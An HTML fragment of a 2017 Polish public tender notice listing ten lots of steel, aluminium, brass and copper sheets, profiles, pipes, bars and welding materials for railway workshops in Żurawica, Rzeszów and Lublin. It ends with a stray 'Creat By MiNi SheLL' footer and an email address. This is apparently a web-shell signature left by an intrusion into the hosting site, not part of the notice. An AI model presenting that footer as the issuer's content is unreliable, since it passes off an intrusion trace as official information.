<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/04/2017, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Blachy stalowe dla RWT Żurawica<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa blach stalowych dla RWT Żurawica:
1. Blacha stalowa gr.1,0 mm wymiar 2000x1000 mm gat.St3s/S235JRG2  10 ark. PN-70/H-92203	kg 250;
2. Blacha stalowa gr.1,50 mm wymiar 2000x1000 mm gat.St3s/S235JRG2  5 ark. PN-70/H-92203 kg 250;
3. Blacha stalowa gr.2,0 mm wymiar 2000x1000 mm gat.St3s/S235JRG2  5 ark. PN-70/H-92203 kg	160;
4. Blacha stalowa gr.3,0 mm wymiar 2000x1000 mm gat.St3s/S235JRG2  10 ark. PN-70/H-92203 kg 480;
5. Blacha stalowa gr.4,0 mm wymiar 2000x1000 mm gat.St3s/S235JRG2  2 ark. PN-70/H-92203	kg 128;
6. Blacha stalowa gr.5,0 mm wymiar 2000x1000 mm gat.St3s/S235JRG2  2 ark.  PN-70/H-92203 kg 160;
7 Blacha stalowa gr.6,0 mm wymiar 2000x1000 mm gat.St3s/S235JRG2  1 ark.  PN-70/H-92203	kg 96;
8. Blacha stalowa gr.8,0 mm wymiar 2000x1000 mm gat.St3s/S235JRG2 PN-70/H-92203	kg 640;
9. Blacha stalowa gr.10,0 mm  wymiar 2000x1000 mm   gat.St3s/S235JRG2 1 ark. PN-70/H-92203 kg 160.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>14622000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Blachy dla RWT Żurawica<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa blach dla RWT Żurawica:
1."Blacha chromowa do ulepszania cieplnego i hartowania powierzchniowego łatwa w obróbce mechanicznej i cieplnej gr.3,0 mm, twardość w stanie zmiękczonym 240 HB , wymiar 2000 x 1000 mm 3 arkusze(certyfikat zgodności z podaną normą)" gat 40H - 1.7035/EN41Cr 4kg 144;
2."Blacha chromowa do ulepszania cieplnego i hartowania powierzchniowego, łatwa w obróbce mechanicznej i cieplnej gr.4,0 mm, twardość w stanie zmiękczonym 240 HB , wymiar 2000 x 1000 mm 5 arkuszy (certyfikat zgodności z podaną normą)" gat 40H - 1.7035/EN41Cr4, kg	32
3."Blacha chromowa do ulepszania cieplnego              
i hartowania powierzchniowego, łatwa w obróbce mechanicznej i cieplnej gr.5,0 mm, twardość w stanie zmiękczonym 240 HB , wymiar 2000 x 1000 mm 3 arkusze (certyfikat zgodności z podaną normą)" gat 40H - 1.7035/EN41Cr4 kg	240;
4."Blacha chromowa do ulepszania cieplnego i hartowania powierzchniowego, łatwa w obróbce mechanicznej i cieplnej gr.6,0 mm, twardość w stanie zmiękczonym 240 HB , wymiar 2000 x 1000 mm 3 arkusze (certyfikat zgodności z podaną normą)" gat 40H - 1.7035/EN41Cr4 kg	288;
5.Blacha węglowa do ulepszania cieplnego, dobrze spawalna, zgrzewalna, łatwa w obróbce gr.6,0 mm, twardość w stanie zmiękczonym -210 HB,                 wymiar 2000 x 1000 mm 3 arkusze(certyfikat zgodności z podaną normą) gat.45 - 1.0503/EN41C45 kg 288;
6.Blacha węglowa do ulepszania cieplnego, dobrze spawalna, zgrzewalna, łatwa w obróbce gr.8,0 mm, twardość w stanie zmiękczonym -210 HB,                 wymiar 2000 x 1000 mm 2 arkusze(certyfikat zgodności z podaną normą)gat.45 - 1.0503/EN41C45 kg 256;
7.Blacha węglowa do ulepszania cieplnego, dobrze spawalna, zgrzewalna, łatwa w obróbce gr.10,0 mm,  twardość w stanie zmiękczonym -210 HB,                 wymiar 2000 x 1000 mm 2 arkusze(certyfikat zgodności z podaną normą)gat.45 - 1.0503/EN41C45 kg 320;
8.Blacha węglowa do ulepszania cieplnego, dobrze spawalna, zgrzewalna, łatwa w obróbce gr.8,0 mm, , twardość w stanie zmiękczonym -210 HB,                 wymiar 2000 x 1000 mm 2 arkusze(certyfikat zgodności z podaną normą) gat.55 - 1.0535/EN41C55 kg 256;
9.Blacha węglowa do ulepszania cieplnego, dobrze spawalna, zgrzewalna, łatwa w obróbce gr.10,0 mm,  twardość w stanie zmiękczonym -210 HB,                  wymiar 2000 x 1000 mm 2 arkusze(certyfikat zgodności z podaną normą)gat.55 - 1.0535/EN41C55 kg 320;
10.Blacha kwasoodporna nierdzewna 1mm wymiar 2000x1000mm 4 ark (certyfikat zgodności z podaną normą)	EN 1.4301 PN 0H18N9 kg	64;
11.Blacha kwasoodporna nierdzewna  2mm wymiar 2000x1000mm   1 ark  (certyfikat zgodności z podaną normą) EN 1.4301 PN 0H18N9 kg 32;
12.Blacha aluminiowa gr.1 /2000x1000 mm 1 ark (certyfikat zgodności z podaną normą) gat.PA6  kg 16;
13.Blacha aluminiowa gr.2 /2000x1000 mm 1 ark (certyfikat zgodności z podaną normą) gat.PA6 kg	54.
 <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>14622000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Blachy dla RWT Rzeszów<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa blach stalowych dla RWT Rzeszów: Blacha aluminiowa gr. 2/2000x1000 mm, 1 ark gat. PA6 kg 60
 <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>14622000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Kształtownik i kątowniki dla RWT Żurawica<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa kształtowników i kątowników dla RWT Żurawica:
1.Kształtownik stalowy  20x20x2 mm   	 gat.St3s/S235JRG2	mb	30;
2.Kształtownik stalowy  30x20x2 mm   	 gat.St3s/S235JRG2	mb	12;
3.Kształtownik stalowy  30x30x2 mm   	 gat.St3s/S235JRG2	mb	12;
4.Kształtownik stalowy  40x27x2 mm   	 gat.St3s/S235JRG2	mb	30;
5.Kształtownik stalowy   50x30x3 mm  	 gat.St3s/S235JRG2	9mb	30;
6.Kształtownik stalowy   50x50x3 mm  	 gat.St3s/S235JRG2	mb	30;
7.Kształtownik stalowy   50x50x5 mm   	 gat.St3s/S235JRG2	mb	24;
8.Kształtownik stalowy   60x60x3 mm  	 gat.St3s/S235JRG2	mb	36;
9.Kształtownik stalowy   100x50x3 mm 	 gat.St3s/S235JRG2	mb	48;
10.Kształtownik stalowy   100x100x5 mm 	 gat.St3s/S235JRG2	mb	48;
11.Kątownik stalowy L 45X45X4 mm	 gat.St3s/S235JRG2	kg	100;
12.Kątownik stalowy L 50X50X5  mm	 gat.St3s/S235JRG2	kg	120.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>14622000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Rury dla RWT Żurawica <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa rur dla RWT Żurawica:
1.Rura stalowa b/szwu fi 12x1,5 gat.R-35/P235T1/ E235N	mb 60
2.Rura stalowa b/szwu fi 14X3  gat.R-35/P235T1/ E235N	mb 60
3.Rura stalowa b/szwu fi 16x2  gat.R-35/P235T1/ E235N	mb 60
4.Rura stalowa b/szwu fi 18x1,5  gat.R-35/P235T1/ E235N	mb 60
5.Rura stalowa b/szwu fi 18x3,0  gat.R-35/P235T1/ E235N	mb 60
6.Rura stalowa b/szwu fi 20x2,6  gat.R-35/P235T1/ E235N	mb 60
7.Rura stalowa b/szwu fi 22x3 gat.R-35/P235T1/ E235N	mb 100
8.Rura stalowa b/szwu fi 25x4 gat.R-35/P235T1/ E235N	mb 48
9.Rura stalowa b/szwu fi 16x2 gat.R-35/P235T1/ E235N	mb 60
10.Rura stalowa b/szwu fi 20x2,6  gat.R-35/P235T1/ E235N mb  24
11.Rura stalowa b/szwu fi 22x3  gat.R-35/P235T1/ E235N	mb 42
12.Rura stalowa b/szwu fi 22x5  gat.R-35/P235T1/ E235N	mb 36
13.Rura stalowa b/szwu fi 25x3  gat.R-35/P235T1/ E235N	mb 42
14.Rura stalowa b/szwu fi 28x1,5 gat.R-35/P235T1/ E235N	mb 36
15.Rura stalowa b/szwu fi 32x3  gat.R-35/P235T1/ E235N	mb 30
16.Rura stalowa b/szwu fi 40x2  gat.R-35/P235T1/ E235N	mb 30
17.Rura stalowa b/szwu fi 38x5  gat.R-35/P235T1/ E235N	mb 48
18.Rura mosięźna b/szwu fi 28x1 gat.R-35/CW508L/ E235N	mb 18
19.Rura aluminiowa fi 25 x 5(certyfikat zgodności z podaną normą) gat.PA6  kg	40
20.Rura aluminiowa fi 60 x 10(certyfikat zgodności z podaną normą) gat.PA6  kg	40
21."Rura z brązu średnica zewnętrzna x grubość ścianki fi 50x7,5 mm gat.BA1032(certyfikat zgodności z podaną normą)"PN-92/H-87050  kg 20
22."Rura z brązu średnica zewnętrzna x grubość ścianki fi 52x7,0 mm gat.BA1032 (certyfikat zgodności z podaną normą)" PN-92/H-87050  kg	20
23."Rura z brązu średnica zewnętrzna x grubość ścianki fi 52x7,0 mm gat.BA1032   (certyfikat zgodności z podaną normą)"	PN-92/H-87050 kg 20
24."Rura miedziana średnica zewnętrzna x grubość ścianki fi 8,0x1,0 mm  gat. M1E Z4 (certyfikat zgodności z podaną normą)" PN-77/H-82120 kg 15
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>14622000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Rury dla RWT Rzeszów<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa rur dla RWT Rzeszów: Rura stalowa b/szwu czarna 42x38, długość 6 mb mb  12
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>14622000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Pręty dla RWT Żurawica<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa prętów dla RWT Żurawica:
1.Pręt stalowy ciągniony fi 80 mm 	gat.St3s/S235JR	kg	400;
2.Pręt st.wacowany fi 40 	gat.45/C45  kg	200;
3.Pręt st.wacowany fi 45 	gat.45/C45  kg	200;
4.Pręt stal. walcowany fi 60 	gat.45/C45  kg	300;
5.Pręt stal. walcowany fi 95 	gat.A-0	kg	500;
6.Pręt stalowy ciągniony fi 50 	gat.55/C55	kg	200;
7.Pręt stalowy ciągniony fi 75 	gat.40H/41Cr4	kg	300;
8.Pręt walcowany fi 100 	gat.45/C45	kg	500;
9.Pręt walcowany fi 100 	gat.St3s/S235JRG2  kg	500;
10.Pręt walcowany fi 110 	gat.40HM/42CrM04   kg	600;
11.Pręt walcowany fi 25 	gat.45/C45	kg	50;
12.Pręt walcowany fi 30 	gat.St3s/S235JRG2	kg	100;
13.Pręt okragły gładki ST3 fi 40 	gat. ST3/S215	kg	200;
14.Pręt ciągniony fi 16   (z ATESTEM)	gat. 45/15HGM	kg	100;
15.Pręt ciągniony fi 20   (z ATESTEM)	gat. 45/15HGM	kg	100;
16.Pręt stal.płaski 60x30   	gat. St3s / S235JR	kg	80;
17.Pręt stal.płaski 65x20   	gat. St3s / S235JR	kg	80;
18.Pręt stal.płaski 120x30 	gat. St3s / S235JR	kg	100;
19.Pręt stal.płaski 120x25     (z ATESTEM)	gat. 45	kg	100;
20.Pręt ciągniony fi 20         (z ATESTEM)	gat.45/C45	kg 40;
21.Pręt stalowy ciągniony fi 80 mm 	gat.St3s/S235JR	kg	100;
22.Pręt ciągniony fi 45                  (z ATESTEM)	gat.45/C45 kg	200;
23.Pręt ciągniony 6-kątny S 36      (z ATESTEM)	gat.A10X /11SMn30 kg	300;
24.Pręt stalowy walcowy fi 12        (z ATESTEM)	gat.1.4301/ 0H18N9	kg	10;
25.Pręt stalowy walcowy fi 40        (z ATESTEM)	gat.1.4301/ 0H18N9	kg	30;
26.Pręt stalowy walcowy fi 50        (z ATESTEM)	gat.1.4301/ 0H18N9	kg	20;
27.Pręt stalowy walcowy fi 60        (z ATESTEM)	gat.1.4301/ 0H18N9	kg	25;
28.Pręt stalowy walcowy fi 70        (z ATESTEM)	gat.1.4301/ 0H18N9	kg	30;
29.Pręt stalowy walcowy fi 110      (z ATESTEM)	gat.1.4301/ 0H18N9	kg	40;
30.Pręt stalowy 6-kątny S-30         (z ATESTEM)	gat. 1.4306/ 00H18N10	kg	20;
31.Pręt aluminiowy fi 30  gat.PA6        (z ATESTEM)	 PN-92/H-93667  	kg	50;
32.Pręt aluminiowy fi 45  gat.PA6        (z ATESTEM)	 PN-92/H-93667  	kg	50;
33.Pręt aluminiowy fi 50  gat.PA6        (z ATESTEM)	 PN-92/H-93667  	kg	50;
34.Pręt aluminiowy fi 60  gat.PA6        (z ATESTEM)	 PN-92/H-93667  	kg	50;
35.Pręt aluminiowy fi 70  gat.PA6        (z ATESTEM)	 PN-92/H-93667  	kg	50;
36.Pręt aluminiowy fi 100  gat.PA6      (z ATESTEM)	 PN-92/H-93667  	kg	60;
37.Pręt z mosiądzu 6-kątny S-14,0      (z ATESTEM)	PN  M63 DIN CuZn37	kg	15;
38.Pręt z mosiądzu 6-kątny S-17,0      (z ATESTEM)	PN  M63 DIN CuZn37	kg	15;
39.Pręt z mosiądzu 6-kątny S-19,0      (z ATESTEM)	PN  M63 DIN CuZn37	kg	20;
40.Pręt z mosiądzu 6-kątny S-22,0      (z ATESTEM)	PN  M63 DIN CuZn37	kg	20;
 <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>14622000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Wyroby hutncze -pozostałe dla RWT Żurawica<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa pozostałych wyrobów hutniczych dla RWT Żurawica:
1.Spoiwo srebrne w paskach gr.0,5 mm,gat.LS 45 do lutowania żeliwa, stali węglowych i niskostopowych oraz miedzi i jej stopów  PN-80/M-68411	kg 1;
2.Anoda z niklu gr.10 mm ( wym.200x600mm) gat.N2  kg 50.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>14622000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Wyroby hutnicze-pozostałe dla RWT Rzeszów<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa pozostałych wyrobów hutniczych dla RWT Rzeszów:
1. Siatka krępowana 100x100,  z drutu stalowego 2 mm,  oczko maks.  20x20  ocynkowana	kg 55;
2. Lina stalowa  10, ocynkowana, gładka, w splocie z rdzeniem włókienniczym, splot min1x19 mb 9.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>14622000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Wyrob hutnicze-pozostałe dla SR Lublin<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa pozostałych wyrobów hutniczych dla SR Lublin: Elektroda  aluminiowa Alcord 12 SI  3,2 x 350	szt 200.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>31711140-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com